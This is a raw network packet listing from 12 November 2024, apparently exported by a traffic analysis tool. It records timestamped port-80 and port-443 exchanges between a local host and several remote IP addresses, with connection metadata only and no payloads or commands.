Nov 12, 2024 00:06:27.577155113 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577163935 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577167988 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577179909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577189922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577198982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577200890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577205896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577215910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577229023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577241898 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577241898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577255011 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577265978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577265978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577279091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577286005 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577289104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577301979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577307940 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577316046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577322006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577328920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577342033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577352047 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577353001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577366114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577370882 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577378988 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577390909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.577397108 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.577442884 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.579444885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.582693100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.611339092 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.615330935 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.619420052 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.619441986 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.619505882 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.619518042 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.619653940 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.629169941 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629184961 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629244089 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.629257917 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629345894 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.629456043 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629504919 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.629511118 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629523039 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.629559040 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.635951042 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636004925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636017084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636035919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636046886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636054993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636089087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636101007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636105061 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636113882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636126995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636127949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636140108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636156082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636182070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636184931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636193991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636205912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636220932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636245966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636406898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636419058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636430025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636440992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636451006 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636451006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636460066 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636464119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636476040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636487007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636493921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636498928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636512041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636516094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636523962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636538982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636545897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636557102 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636563063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636575937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636584044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636588097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636599064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636610031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636610985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636622906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636625051 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636635065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636646986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636651993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636660099 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636672974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636678934 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636686087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636697054 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636702061 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636714935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636719942 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636734009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636740923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636748075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636759043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636765957 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636770010 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636780977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636790991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636795044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636802912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636815071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636826992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636828899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636838913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636845112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636851072 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636853933 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636868954 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636884928 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636885881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636898994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636903048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636910915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636921883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636925936 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636940002 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636940956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636954069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636964083 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636966944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636979103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.636986971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.636991024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637003899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637003899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637016058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637032986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637034893 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637044907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637058020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637061119 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637070894 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637079954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637082100 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637094975 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637105942 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637105942 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637124062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637134075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637135029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637146950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637155056 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637161970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637172937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637176991 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637183905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637193918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637203932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637207031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637217045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637222052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637234926 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637247086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637252092 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637259007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637270927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637279034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637280941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637295008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637295008 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637310982 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637320995 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637322903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637335062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637346029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637353897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637356997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637372971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637377024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637391090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637393951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637404919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637417078 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637418032 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637428045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637433052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637443066 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637454033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637481928 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637484074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637496948 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637507915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637517929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637528896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637530088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637552977 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637552977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637567043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637568951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637579918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637590885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637597084 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637603045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637614965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637615919 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637626886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637638092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637640953 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637649059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637660980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637671947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637682915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637689114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637695074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637706041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637712955 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637722969 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637736082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637737989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637748003 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637761116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637767076 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637775898 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637792110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637799978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637804985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637819052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637828112 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637831926 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637835979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637845993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637856960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637859106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637870073 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637872934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637886047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637892962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637898922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637902975 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637912989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637921095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637926102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637938023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637944937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637949944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637960911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637960911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637974977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.637986898 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.637989044 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638009071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638015032 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638020992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638032913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638035059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638047934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638055086 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638061047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638072968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638084888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638086081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638096094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638098955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.638122082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638149023 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.638233900 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.638669014 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.638714075 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:27.638832092 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:27.660918951 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.660937071 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.666250944 CET	443	49847	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.666429043 CET	49847	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.666449070 CET	443	49847	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.667397022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667437077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667449951 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667449951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667480946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667489052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667496920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667501926 CET	443	49847	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.667509079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667521000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667531967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667543888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667551041 CET	49847	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.667553902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667560101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667588949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667609930 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667660952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667673111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667682886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667694092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667697906 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667705059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667710066 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667718887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667731047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667732000 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667742968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667752028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667793036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667803049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667814970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667825937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667838097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667845011 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667849064 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667855978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667867899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667880058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667880058 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667893887 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667912960 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.667927027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.667952061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667973995 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.667993069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.667994022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668005943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668016911 CET	49849	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.668046951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668054104 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668064117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668076992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668087959 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668098927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668101072 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668111086 CET	80	49758	185.215.113.206	192.168.2.5
